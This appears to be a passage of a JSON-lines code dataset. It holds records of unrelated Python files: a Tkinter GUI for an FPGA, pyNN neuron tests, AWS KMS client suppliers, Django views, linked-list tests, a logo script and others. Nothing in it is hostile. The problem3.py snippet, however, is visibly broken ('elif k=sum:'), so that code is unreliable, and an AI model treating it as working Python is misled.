100\n start = 'the send_dir is '\n second = 'the batch is '\n txt.insert(END, start)# 显示详情\n txt.insert(END, send_dir) # 显示weight\n txt.insert(END, '\\n') # 换行\n txt.insert(END, second)# 显示详情\n txt.insert(END, str(batch))# 显示详情\n txt.insert(END, '\\n') # 换行\n txt.insert(END, '\\n') # 换行\n\n# 单张\ndef run2():\n batch = 1\n start = 'the receive_dir is '\n second = 'the batch is '\n txt.insert(END, start)# 显示详情\n txt.insert(END, receive_dir) # 显示weight\n txt.insert(END, '\\n') # 换行\n txt.insert(END, second)# 显示详情\n txt.insert(END, str(batch))# 显示详情\n txt.insert(END, '\\n') # 换行\n txt.insert(END, '\\n') # 换行\n\n# 发送数据给FPGA\ndef run3():\n i = 0\n while not os.listdir(receive_dir) :\n i += 1\n for r in os.listdir(receive_dir):\n for s in os.listdir(send_dir):\n if r == s:\n # 显示fpga计算的原始图片\n lb1 = Label(root, text='原始图片 ')\n lb1.place(relx=0.1, rely=0.5, relwidth=0.1, relheight=0.1)\n image_s = Image.open(os.path.join(send_dir, s))\n image_s = ImageTk.PhotoImage(image=image_s)\n lb2 = Label(image=image_s)\n lb2.place(relx=0.1, rely=0.6)\n\n # 显示fpga计算的预测图片\n lb3 = Label(root, text='预测显示 ')\n lb3.place(relx=0.5, rely=0.5, relwidth=0.1, relheight=0.1)\n image_r = Image.open(os.path.join(receive_dir, r))\n image_r = ImageTk.PhotoImage(image=image_r)\n lb4 = Label(image=image_r)\n lb4.place(relx=0.5, rely=0.6)\n\nroot = Tk()\nroot.geometry('800x800')\nroot.title('上位机')\n\nreceive_dir = '/home/dapang/workspace/新建文件夹'\nsend_dir = ''\n# inp1 = Entry(root)\n# inp1.place(relx=0.1, rely=0.1, relwidth=0.3, relheight=0.1)\n# inp2 = Entry(root)\n# inp2.place(relx=0.6, rely=0.1, relwidth=0.3, relheight=0.1)\n\n# 批处理目录 run1()\nbtn1 = Button(root, text='批处理', command=run1)\nbtn1.place(relx=0.1, rely=0.1, relwidth=0.2, relheight=0.1)\n\n# 接收测试结果的目录 run2()\nbtn2 = Button(root, text='接收结果', command=run2)\nbtn2.place(relx=0.4, rely=0.1, relwidth=0.2, relheight=0.1)\n\n# 发送目录给FPGA run3()\nbtn3 = Button(root, text='计算', command=run3)\nbtn3.place(relx=0.7, rely=0.1, relwidth=0.2, relheight=0.1)\n\n# 在窗体垂直自上而下位置60%处起,布局相对窗体高度40%高的文本框\ntxt = Text(root)\ntxt.place(relx=0.1, rely=0.3, relwidth=0.8,relheight=0.1)\n\nroot.mainloop()\n","sub_path":".github/workflows/grahic.py","file_name":"grahic.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"122213626","text":"import sys\nsys.path.insert(0, \"../../pyfunctor\")\n\nimport csv_handler as csv_handler\nimport transform as transformer\n\n#usage: python type_extractor.py [type] \n\ntypename = sys.argv[1]\n# typename = 'evaluation' # options: evaluation, request, fact, reference, quote, non-arg\nassert(typename in {'evaluation', 'request', 'fact', 'reference', 'quote'})\n\ndef extract(data, typename):\n dataset = csv_handler.csv_readlines(\"./dataset/\" + data + \"set.csv\")\n dataset = transformer.indexleft_func(dataset)\n dataset = transformer.map_func(dataset, lambda row : (row[0], row[1][1], row[1][2]))\n output_path = \"./\" + data + \".csv\"\n\n def e_func(triplet):\n label = 0\n if triplet[2] == typename:\n label = 1\n return (triplet[0], triplet[1], label)\n\n\n final = transformer.map_func(dataset, lambda triplet: e_func(triplet))\n csv_handler.csv_writelines(output_path, final)\n\nextract('train', typename)\nextract('dev', typename)\n\n","sub_path":"data/EVAL/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"237034924","text":"n=10\nx=3\n\nsum=n\np=0\nk=pow(x,p)\npowers=[]\ntemp=0\nwhile k<=sum:\n for z in powers:\n temp=temp+pow(x,int(z))\n if temp is n:\n break\n elif k=sum:\n if k is sum:\n powers.append(str(p))\n k=pow(x,p)\n else:\n p=p-1\n powers.append(str(p))\n k=pow(x,p)\n p=0\n temp=temp+k\n sum=n-temp\n temp=0\n k=pow(x,p)\n\n\nprint(powers)","sub_path":"problem1/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313883937","text":"import matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pynn_genn as pynn\nfrom pyNN.utility.plotting import *\n\ndef plot_spiketrains(segment):\n for spiketrain in segment.spiketrains:\n y = np.ones_like(spiketrain) * spiketrain.annotations['source_id']\n plt.plot(spiketrain, y, '.')\n plt.ylabel(segment.name)\n plt.setp(plt.gca().get_xticklabels(), visible=True)\n\n\ndef plot_signal(signal, index, colour=None):\n label = \"Neuron %d\" % signal.annotations['source_ids'][index]\n plt.plot(signal.times, signal[:, index], color=colour, label=label)\n plt.ylabel(\"%s (%s)\" % (signal.name, signal.units._dimensionality.string))\n plt.setp(plt.gca().get_xticklabels(), visible=True)\n plt.legend()\n\n\nN_NEURONS = 1\nw = 0.01\nsim_timestep = 0.1\nsyn_delay = sim_timestep\nv_init = -50.0\n\nneuron_parameters = {\n 'v_thresh': -35.0,\n 'tau_m': 20.,\n 'tau_refrac': 10.0,\n 'v_reset': -60.0, #hdbrgs\n 'tau_syn_E': 5.0,\n 'tau_syn_I': 5.0,\n 'i_offset': 0.0,\n #ESS - BrainScaleS\n 'cm': 0.2,\n 'v_rest': v_init,\n 'e_rev_E': 0.,\n 'e_rev_I': -92.,\n 'tau_slow': 10.0,\n 'tau_syn_E_slow': 100.0,\n 'tau_syn_I_slow': 100.0,\n 'v_activate_slow': -100.0,\n\n}\n\npynn.setup(timestep=sim_timestep, use_cpu=True)\nneuron_class = pynn.IF_curr_exp_slow\nneuron_class = pynn.IF_cond_exp_slow\n\nneurons = pynn.Population(N_NEURONS,\n neuron_class(**neuron_parameters),\n label='Target'\n )\nneurons.record(['spikes', 'v', 'v_slow', 'dvdt'])\n\npynn.initialize(neurons, v=v_init)\npynn.initialize(neurons, v_slow=v_init)\npynn.initialize(neurons, v_slow_old=v_init)\n\n\ninputs = pynn.Population(N_NEURONS,\n pynn.SpikeSourcePoisson(rate=100.0),\n label='Input'\n )\ndoper = pynn.Population(N_NEURONS,\n pynn.SpikeSourceArray(spike_times=[60.0]),\n label='Feedback'\n )\n\n\nsyn = pynn.StaticSynapse(weight=w*0.01, delay=syn_delay)\nproj = pynn.Projection(doper, neurons,\n pynn.OneToOneConnector(), syn,\n receptor_type='excitatory_slow')\n\nsyn = pynn.StaticSynapse(weight=w, delay=syn_delay)\nproj = pynn.Projection(inputs, neurons,\n pynn.OneToOneConnector(), syn,\n receptor_type='excitatory')\n\npynn.run(100.0)\n\ndata = neurons.get_data()\nif len(data.segments):\n data = data.segments[0]\n out_spikes = np.array(data.spiketrains)\n\n pynn.end()\n\n plt.figure()\n plt.suptitle('Spikes')\n plot_spiketrains(data)\n plt.xlabel(\"time (%s)\" % data.analogsignals[0].times.units._dimensionality.string)\n\n # plt.figure()\n for arr in data.analogsignals:\n plt.figure()\n plt.suptitle('%s'%arr.name)\n for i in range(arr.shape[1]):\n\n plot_signal(arr, i)\n\n plt.grid()\n plt.xlabel(\"time (%s)\" % arr.times.units._dimensionality.string)\n\n\n plt.show()\n\n\n\n\n","sub_path":"codebase/slow_dvdt/test_neuron_properties.py","file_name":"test_neuron_properties.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"315629177","text":"\"\"\"\nunit tests for the metric/ distance estimator\n.. codeauthor:: Maximilian Springenberg \n\"\"\"\n# unit-test relevant imports\nfrom unittest import TestCase\n# own code\nfrom src.estimation import base\nfrom src.util.phoc_util import phoc\n\n\nclass TestDistEstimator(TestCase):\n\n def setUp(self):\n # all combinations of the characters \"cat\"\n self.words = []\n for c1 in 'cat':\n self.words.append(c1)\n for c2 in 'cat':\n self.words.append(c1+c2)\n for c3 in 'cat':\n self.words.append(c1+c2+c3)\n # estimator\n self.est = base.DistEstimator(self.words, 'cosine')\n\n def test_estimate(self):\n # estimate and check for results\n query = [phoc('cat')]\n query_words = ['cat']\n self.assertEqual(self.est.estimate_set(query), query_words)\n","sub_path":"test/estimation/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114581432","text":"from PyQt5.QtCore import *\n\n\nclass Truck(QObject):\n \"\"\"\n General truck class with common types and functions\n \"\"\"\n def __init__(self):\n QObject.__init__(self)\n self.truck_name = None\n self.current_time = 0\n self.function_list = []\n self.times = {'arrival_time': 0}\n self.current_state = 0\n self.state_signal = False\n self.behaviour_list = []\n self.relevant_data = None\n self.changeover_time = 0\n self.next_state_time = 0\n self.current_door = None\n self.finish_time = 0\n\n def run(self, current_time):\n self.current_time = current_time\n self.function_list[self.current_state]()\n if self.state_signal:\n self.state_signal = False\n return 1\n return 0\n\n def coming(self):\n if self.times['arrival_time'] == self.current_time:\n self.times['arrived'] = self.current_time\n self.next_state()\n\n def next_state(self, name=None):\n self.state_signal = True\n if name:\n print('name')\n print(self.behaviour_list.index('loading'))\n self.current_state = self.behaviour_list.index(name)\n else:\n self.current_state += 1","sub_path":"src/truck.py","file_name":"truck.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"573927778","text":"# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\"\"\"AWS KMS client suppliers for use with AWS KMS keyring.\n\n.. versionadded:: 1.5.0\n\n\"\"\"\nimport functools\nimport logging\n\nimport attr\nimport six\nfrom attr.validators import deep_iterable, instance_of, is_callable, optional\nfrom botocore.client import BaseClient\nfrom botocore.config import Config as BotocoreConfig\nfrom botocore.session import Session as BotocoreSession\n\nfrom aws_encryption_sdk.exceptions import UnknownRegionError\nfrom aws_encryption_sdk.identifiers import USER_AGENT_SUFFIX\nfrom aws_encryption_sdk.internal.validators import value_is_not_a_string\n\nfrom ._client_cache import ClientCache\n\ntry: # Python 3.5.0 and 3.5.1 have incompatible typing modules\n from typing import Callable, Union # noqa pylint: disable=unused-import\n\n ClientSupplierType = Callable[[Union[None, str]], BaseClient]\nexcept ImportError: # pragma: no cover\n # We only actually need these imports when running the mypy checks\n pass\n\n_LOGGER = logging.getLogger(__name__)\n__all__ = (\n \"ClientSupplier\",\n \"ClientSupplierType\",\n \"DefaultClientSupplier\",\n \"AllowRegionsClientSupplier\",\n \"DenyRegionsClientSupplier\",\n)\n\n\nclass ClientSupplier(object):\n \"\"\"Base class for client suppliers.\n\n .. versionadded:: 1.5.0\n\n \"\"\"\n\n def __call__(self, region_name):\n # type: (Union[None, str]) -> BaseClient\n \"\"\"Return a client for the requested region.\n\n :rtype: BaseClient\n \"\"\"\n raise NotImplementedError(\"'ClientSupplier' is not callable\")\n\n\n@attr.s\nclass DefaultClientSupplier(ClientSupplier):\n \"\"\"The default AWS KMS client supplier.\n Creates and caches clients for any region.\n\n .. versionadded:: 1.5.0\n\n If you want clients to have special credentials or other configuration,\n you can provide those with custom ``botocore`` Session and/or `Config`_ instances.\n\n .. _Config: https://botocore.amazonaws.com/v1/documentation/api/latest/reference/config.html\n\n .. code-block:: python\n\n from aws_encryption_sdk.keyrings.aws_kms.client_supplier import DefaultClientSupplier\n from botocore.session import Session\n from botocore.config import Config\n\n my_client_supplier = DefaultClientSupplier(\n botocore_session=Session(**_get_custom_credentials()),\n client_config=Config(connect_timeout=10),\n )\n\n :param botocore_session: Botocore session to use when creating clients (optional)\n :type botocore_session: botocore.session.Session\n :param client_config: Config to use when creating client (optional)\n :type client_config: botocore.config.Config\n \"\"\"\n\n _botocore_session = attr.ib(default=attr.Factory(BotocoreSession), validator=instance_of(BotocoreSession))\n _client_config = attr.ib(\n default=attr.Factory(functools.partial(BotocoreConfig, user_agent_extra=USER_AGENT_SUFFIX)),\n validator=instance_of(BotocoreConfig),\n )\n\n def __attrs_post_init__(self):\n \"\"\"Set up the internal cache.\"\"\"\n self._client_cache = ClientCache(botocore_session=self._botocore_session, client_config=self._client_config)\n\n def __call__(self, region_name):\n # type: (Union[None, str]) -> BaseClient\n \"\"\"Return a client for the requested region.\n\n :rtype: BaseClient\n \"\"\"\n return self._client_cache.client(region_name=region_name, service=\"kms\")\n\n\n@attr.s\nclass AllowRegionsClientSupplier(ClientSupplier):\n \"\"\"AWS KMS client supplier that only supplies clients for the specified regions.\n\n .. versionadded:: 1.5.0\n\n :param List[str] allowed_regions: Regions to allow\n :param ClientSupplier client_supplier: Client supplier to wrap (optional)\n \"\"\"\n\n allowed_regions = attr.ib(\n validator=(deep_iterable(member_validator=instance_of(six.string_types)), value_is_not_a_string)\n )\n _client_supplier = attr.ib(default=attr.Factory(DefaultClientSupplier), validator=optional(is_callable()))\n\n def __call__(self, region_name):\n # type: (Union[None, str]) -> BaseClient\n \"\"\"Return a client for the requested region.\n\n :rtype: BaseClient\n :raises UnknownRegionError: if a region is requested that is not in ``allowed_regions``\n \"\"\"\n if region_name not in self.allowed_regions:\n raise UnknownRegionError(\"Unable to provide client for region '{}'\".format(region_name))\n\n return self._client_supplier(region_name)\n\n\n@attr.s\nclass DenyRegionsClientSupplier(ClientSupplier):\n \"\"\"AWS KMS client supplier that supplies clients for any region except for the specified regions.\n\n .. versionadded:: 1.5.0\n\n :param List[str] denied_regions: Regions to deny\n :param ClientSupplier client_supplier: Client supplier to wrap (optional)\n \"\"\"\n\n denied_regions = attr.ib(\n validator=(deep_iterable(member_validator=instance_of(six.string_types)), value_is_not_a_string)\n )\n _client_supplier = attr.ib(default=attr.Factory(DefaultClientSupplier), validator=optional(is_callable()))\n\n def __call__(self, region_name):\n # type: (Union[None, str]) -> BaseClient\n \"\"\"Return a client for the requested region.\n\n :rtype: BaseClient\n :raises UnknownRegionError: if a region is requested that is in ``denied_regions``\n \"\"\"\n if region_name in self.denied_regions:\n raise UnknownRegionError(\"Unable to provide client for region '{}'\".format(region_name))\n\n return self._client_supplier(region_name)\n","sub_path":"src/aws_encryption_sdk/keyrings/aws_kms/client_suppliers.py","file_name":"client_suppliers.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"408310953","text":"from django.conf.urls import url\nfrom customers.views import *\n\nurlpatterns = [\n\n # Example: /\n url(r'^$', CustomerLV.as_view(), name='index'),\n\n # Example: /customer/ (same as /)\n url(r'^customer/$', CustomerLV.as_view(), name='customer_list'),\n\n # Example: /customer/woochang\n url(r'^customer/(?P[-\\w]+)/$', CustomerDV.as_view(), name='customer_detail'),\n\n # Example: /search/\n url(r'^search/$', SearchFormView.as_view(), name='search'),\n\n # Example: /add/\n url(r'^add/$',\n CustomerCreateView.as_view(), name=\"add\",\n ),\n\n # Example: /change/\n url(r'^change/$', CustomerChangeLV.as_view(), name=\"change\",\n ),\n\n # Example: /99/update/\n url(r'^(?P[0-9]+)/update/$', CustomerUpdateView.as_view(), name=\"update\",\n ),\n\n # Example: /99/delete/\n url(r'^(?P[0-9]+)/delete/$', CustomerDeleteView.as_view(), name=\"delete\",\n ),\n\n\n]","sub_path":"customers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"42033240","text":"\"\"\"\nUpdate note: Never use this module to test your emit functions.\nUse the file `auto_test.py` in the same directory instead.\n\n\"\"\"\n\nimport ast\nfrom astpretty import pprint\nfrom yapypy.extended_python.parser import parse\nfrom yapypy.extended_python.symbol_analyzer import ASTTagger, SymTable, to_tagged_ast, Tag\nfrom yapypy.extended_python.py_compile import py_compile\nimport dis\n\n\ndef parse_expr(expr_code):\n return parse(expr_code).result.body[0].value\n\n\nstmt = parse(\"\"\"\nprint(1)\ndef f(x):\n a = 1\n def g(y):\n a + 1\n def u(z):\n k = 1\n v + k\n v = 3\n k = 4\n\"\"\").result\n\nres: Tag = to_tagged_ast(stmt)\nprint(res.tag.show_resolution())\n#\nctx = {}\nexec(\n r\"\"\"\nfrom asyncio import sleep, get_event_loop\nclass S:\n def __init__(self): self.i = 0\n def __aiter__(self): return self\n async def __anext__(self):\n if self.i < 10:\n self.i += 1\n await sleep(0.1)\n return self.i\n raise StopAsyncIteration\n\ndef to_t(aiter):\n async def _():\n d = []\n async for each in aiter:\n d.append(each)\n return tuple(d)\n return get_event_loop().run_until_complete(_())\n\"\"\", ctx)\nstmt = parse(\"\"\"\nclass S:\n pass\n\"\"\").result\npprint(stmt)\n# code = py_compile(stmt)\n# exec(code, ctx)\n# dis.dis(code.co_consts[0])\n# dis.dis(code.co_consts[1])\n\n# try:\n# parse_expr('f(a=1, b)\\n')\n# except SyntaxError:\n# print('good')\n#\n# from bytecode import Bytecode, Instr, Label\n# bc = Bytecode()\n# bc.append(Instr(\"BUILD_MAP\", 0))\n# bc.append(Instr(\"LOAD_GLOBAL\", \"range\"))\n# bc.append(Instr(\"LOAD_CONST\", 2))\n# bc.append(Instr(\"CALL_FUNCTION\", 1, lineno=2))\n#\n# l1 = Label()\n# l2 = Label()\n# bc.append(Instr(\"GET_ITER\"))\n# bc.append(l1)\n# bc.append(Instr(\"FOR_ITER\", l2))\n# bc.append(Instr(\"STORE_FAST\", \"i\"))\n# bc.append(Instr(\"LOAD_CONST\", 2))\n# bc.append(Instr(\"LOAD_CONST\", 1, lineno=1))\n# bc.append(Instr(\"MAP_ADD\", 2))\n# bc.append(Instr(\"JUMP_ABSOLUTE\", l1))\n# bc.append(l2)\n# bc.append(Instr(\"RETURN_VALUE\", ))\n#\n# code = bc.to_code()\n# print(eval(code))\n# dis.show_code(code)\n# dis.dis(code)\n","sub_path":"snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"123664324","text":"import unittest\n\n\nclass Node(object):\n def __init__(self, data, next=None):\n self.data = data\n self.next = next\n\n\nclass SingleList(object):\n def __init__(self):\n self.head = None\n self.tail = None\n\n\n def insert_after(self, node, data):\n new_node = Node(data, node.next)\n node.next = new_node\n if self.tail == node:\n self.tail = new_node\n\n\n def insert_front(self, data):\n new_node = Node(data, self.head)\n self.head = new_node\n if self.tail is None:\n self.tail = self.head\n\n\n def insert_back(self, data):\n if self.tail is None:\n self.head = self.tail = Node(data)\n else:\n self.insert_after(self.tail, data)\n\n\n def __iter__(self):\n current = self.head\n while current is not None:\n yield current\n current = current.next\n raise StopIteration\n\n\ndef remove_duplicates(single_list):\n seen_elements = set()\n node = single_list.head\n prev_node = None\n while node is not None:\n if node.data in seen_elements:\n prev_node.next = node.next\n else:\n seen_elements.add(node.data)\n prev_node = node\n node = node.next\n\n\ndef remove_duplicates_no_set(single_list):\n node = single_list.head\n runner = None\n\n while node is not None:\n prev_runner = node\n runner = node.next\n while runner is not None:\n if node.data == runner.data:\n prev_runner.next = runner.next\n runner = runner.next\n node = node.next\n\n\nclass TestSingleList(unittest.TestCase):\n def test_init(self):\n l = SingleList()\n self.assertIsNone(l.head)\n self.assertIsNone(l.tail)\n l.insert_front(5)\n self.assertEqual(l.head.data, 5)\n self.assertEqual(l.tail.data, 5)\n l = SingleList()\n l.insert_back(3)\n self.assertEqual(l.head.data, 3)\n self.assertEqual(l.tail.data, 3)\n\n\n def test_insert_front(self):\n l = SingleList()\n l.insert_front(5)\n self.assertEqual(l.head.data, 5)\n self.assertEqual(l.tail.data, 5)\n l.insert_front(3)\n self.assertEqual(l.head.data, 3)\n self.assertEqual(l.tail.data, 5)\n\n\n def test_insert_back(self):\n l = SingleList()\n l.insert_back(5)\n self.assertEqual(l.head.data, 5)\n self.assertEqual(l.tail.data, 5)\n l.insert_back(3)\n self.assertEqual(l.head.data, 5)\n self.assertEqual(l.tail.data, 3)\n\n def test_remove_duplicates(self):\n l = SingleList()\n remove_duplicates(l)\n self.assertEqual([i.data for i in l], [])\n\n l.insert_back(5)\n remove_duplicates(l)\n self.assertEqual([i.data for i in l], [5])\n\n l.insert_back(5)\n remove_duplicates(l)\n self.assertEqual([i.data for i in l], [5])\n\n l.insert_back(5)\n l.insert_back(5)\n remove_duplicates(l)\n self.assertEqual([i.data for i in l], [5])\n\n l.insert_back(3)\n l.insert_front(3)\n remove_duplicates(l)\n self.assertEqual([i.data for i in l], [3, 5])\n\n\n def test_remove_duplicates_no_set(self):\n l = SingleList()\n remove_duplicates_no_set(l)\n self.assertEqual([i.data for i in l], [])\n\n l.insert_back(5)\n remove_duplicates_no_set(l)\n self.assertEqual([i.data for i in l], [5])\n\n l.insert_back(5)\n remove_duplicates_no_set(l)\n self.assertEqual([i.data for i in l], [5])\n\n l.insert_back(5)\n l.insert_back(5)\n remove_duplicates_no_set(l)\n self.assertEqual([i.data for i in l], [5])\n\n l.insert_back(3)\n l.insert_front(3)\n remove_duplicates_no_set(l)\n self.assertEqual([i.data for i in l], [3, 5])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"src/main/python/chap02LinkedLists/ex2_01_dupes.py","file_name":"ex2_01_dupes.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"178526597","text":"from django.db import models\nfrom ckeditor.fields import RichTextField\nfrom django.urls import reverse\n\n\nclass Category(models.Model):\n slug = models.SlugField(primary_key=True, max_length=50)\n title = models.CharField(max_length=50,)\n parent = models.ForeignKey('self', related_name='children', null=True, blank=True, on_delete=models.CASCADE)\n\n def __str__(self):\n if self.parent:\n return f'{self.parent} -> {self.title}'\n return self.title\n\n @property\n def get_children(self):\n if self.children:\n return self.children.all()\n return False\n\n\nclass Product(models.Model):\n STATUS_CHOICES = (\n ('in stock', 'В наличии'),\n ('out of stock', 'Нет в наличии')\n )\n\n title = models.CharField(max_length=50,)\n category = models.ManyToManyField(Category, related_name='products',)\n description = RichTextField(null=True, blank=True)\n image = models.ImageField(upload_to='images/')\n price = models.DecimalField(max_digits=12, decimal_places=2)\n stock = models.CharField(choices=STATUS_CHOICES, max_length=50)\n created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.title\n\n @property\n def get_absolute_url(self):\n return reverse('product_detail', args=[str(self.id)])\n\n def get_category_name(self):\n return self.category\n\n class Meta:\n ordering = ['-created']\n\n\n\n","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"51771535","text":"#!/usr/bin/env python\n\nfrom subprocess import call\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Circle, Rectangle\n\n\ndef get_molecule_positions(theta=0, shrink=0.25, r=0.6):\n\n L = 1.0\n bond_ratio = 0.55\n phi = 103.99987509868838 / 180 * np.pi\n theta = theta / 180 * np.pi\n M = np.array([\n [np.cos(theta), np.sin(theta)],\n [-np.sin(theta), np.cos(theta)]\n ])\n pos = np.array([\n [0.0, 0.0],\n [1.0, 0.0],\n [np.cos(phi), np.sin(phi)],\n ])\n pos = np.dot(M, pos.T).T * shrink\n r1 = L / (bond_ratio + 1)\n r2 = r1 * bond_ratio\n\n return np.array([r1, r2, r2]) * shrink, pos\n\n\nfigure = plt.figure(\n figsize=(3.0, 4.0)\n)\nax = plt.subplot()\nax.set_aspect('equal')\nax.axis('off')\n\n############################################################\nR0 = 1.0\nC0 = Circle(\n (0.0, 0.0), radius=R0,\n facecolor='k',\n alpha=0.7,\n)\nC1 = Circle(\n (0.0, 0.0), radius=0.55 * R0,\n facecolor='w'\n)\n\nax.add_patch(C0)\nax.add_patch(C1)\n\n############################################################\n\nMOLCOLORS = ['r', 'b', 'b']\nR, P = get_molecule_positions(theta=-10)\nfor ii in range(3):\n cc = Circle(\n P[ii], radius=R[ii],\n facecolor=MOLCOLORS[ii],\n alpha=0.6\n )\n ax.add_patch(cc)\n\nR, P = get_molecule_positions(theta=-120, shrink=0.15)\nP += np.array([-0.2, -0.2])\nfor ii in range(3):\n cc = Circle(\n P[ii], radius=R[ii],\n facecolor=MOLCOLORS[ii],\n alpha=0.5\n )\n ax.add_patch(cc)\n\nR, P = get_molecule_positions(theta=120, shrink=0.1)\nP += np.array([0.2, -0.2])\nfor ii in range(3):\n cc = Circle(\n P[ii], radius=R[ii],\n facecolor=MOLCOLORS[ii],\n alpha=0.4\n )\n ax.add_patch(cc)\n############################################################\n\nNAMD = [x.upper() for x in 'namd']\nstart_angle = 60.0 / 180. * np.pi\nfor ii in range(4):\n tc = np.exp(1j * (start_angle + ii * np.pi / 2))\n cc = Circle(\n (tc.real, tc.imag), radius=0.4,\n facecolor='white',\n # alpha=0.9\n )\n ax.add_patch(cc)\n cc = Circle(\n (tc.real, tc.imag), radius=0.32,\n facecolor='red',\n alpha=0.5\n )\n ax.add_patch(cc)\n ax.text(tc.real, tc.imag - 0.05, NAMD[ii],\n ha=\"center\",\n va=\"center\",\n fontsize=52,\n # family='monospace',\n color='white',\n fontweight='bold',\n transform=ax.transData,\n fontname='Cooper Black',\n # bbox=dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n )\n\n############################################################\n\nax.plot([-1.4, 1.4], [-1.4, -1.4], 'k-', lw=5.0)\n\n############################################################\nTEXT = 'HEFEI'\nTPOS = np.linspace(-1.1, 1.1, 5, endpoint=True)\nTROT = [-19.05462068, 1.69593734, -11.93570325, -0.39501574, 22.31639076]\n# TROT = [-16.59700324, -7.07637502, 29.74676562, 7.06633301, 22.90883817]\n# TROT = np.random.uniform(-1, 1, 5) * 30\n# print(TROT)\n\nTCLR = plt.rcParams['axes.prop_cycle'].by_key()['color']\n\nfor ii in range(5):\n h = TPOS[ii]\n v = -2.05 + np.sin(ii * np.pi / 2) * 0.2\n # v = -1.95\n T = plt.text(h, v, TEXT[ii],\n ha=\"center\",\n va=\"center\",\n fontsize=52,\n # family='monospace',\n color='white', alpha=0.95,\n rotation=TROT[ii],\n fontweight='bold',\n transform=ax.transData,\n fontname='Cooper Black',\n # bbox=dict(pad=0.1, lw=0.0, boxstyle='circle', facecolor='green', alpha=0.6)\n )\n # ax.plot([h,], [v], marker='o', ms=5)\n\n # box = T.get_window_extent().inverse_transformed(ax.transData)\n # box_w = box.x1 - box.x0\n # box_h = box.y1 - box.y0\n # RR = Rectangle(\n # (box.x0, box.y0 + 0.1), box_w, box_h,\n # facecolor='green'\n # )\n # ax.add_patch(RR)\n\n cc = Circle(\n (h, v + 0.05), radius=0.3,\n # facecolor='green',\n facecolor=TCLR[ii],\n alpha=0.6\n )\n ax.add_patch(cc)\n\n\nax.set_xlim(-1.5, 1.5)\nax.set_ylim(-2.5, 1.4)\n\nplt.tight_layout(pad=0.1)\nplt.savefig('logo.png', dpi=300)\n# plt.show()\n\n# from subprocess import call\n# call('feh -xdF logo.png'.split())\n","sub_path":"logo/logo.py","file_name":"logo.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644688081","text":"import redis, pickle, threading\n\nfrom django.shortcuts import render, render_to_response\nfrom django.http import HttpResponse\nfrom .form import BattleSettingsForm\nfrom .factory import Factory\n\ndef index(request):\n return render(request, 'index.html', {'form': BattleSettingsForm})\n\n\ndef start_battle(request):\n battlefield = Factory(armies_num=int(request.POST.get('armies_num')),\n squads_per_army=int(request.POST.get('squads_per_army')),\n operators_per_veh=int(request.POST.get('operators_per_veh')),\n soldier_recharge=int(request.POST.get('soldier_recharge')),\n soldier_health=int(request.POST.get('soldier_health')),\n vehicle_recharge=int(request.POST.get('vehicle_recharge')),\n vehicle_health=int(request.POST.get('vehicle_health')),\n strategy=request.POST.get('strategy')\n ).create_battlefield()\n t = threading.Thread(target=battlefield.start, args=(), kwargs={})\n t.setDaemon(True)\n t.start()\n return render(request, 'result.html')\n\n\ndef update_state(request):\n r = redis.StrictRedis(host='localhost', port=6379, db=0)\n battle_stats = pickle.loads(r.get('battle_stats'))\n battle_result = r.get('result')\n return render_to_response('stats.html', {'battle_stats': battle_stats, 'result': battle_result})\n","sub_path":"classroom/django_databases_example/django_battle/battle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"158798109","text":"import sys\nsys.stdin = open('그룹나누기.txt')\ndef find_set(x):\n if x != people[x]:\n\n return find_set(people[x])\n\n return x\n\ndef Union(x,y):\n a = find_set(x)\n b = find_set(y)\n\n if a < b:\n people[b] = a\n return\n elif b < a:\n people[a] = b\n return\n else:\n return\n\nT = int(input())\nfor tc in range(T):\n N ,M = map(int, input().split())\n arr = list(map(int, input().split()))\n people = list(i for i in range(N+1))\n for i in range(M):\n Union(arr[i*2], arr[i*2 +1])\n cnt = 0\n for i in range(1,N+1):\n if i == people[i]:\n cnt +=1\n\n\n print('#{} {}'.format(tc+1,cnt))\n\n\n","sub_path":"08_algorithm/28_algorithm2019.09.24/그룹나누기.py","file_name":"그룹나누기.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"403609463","text":"import 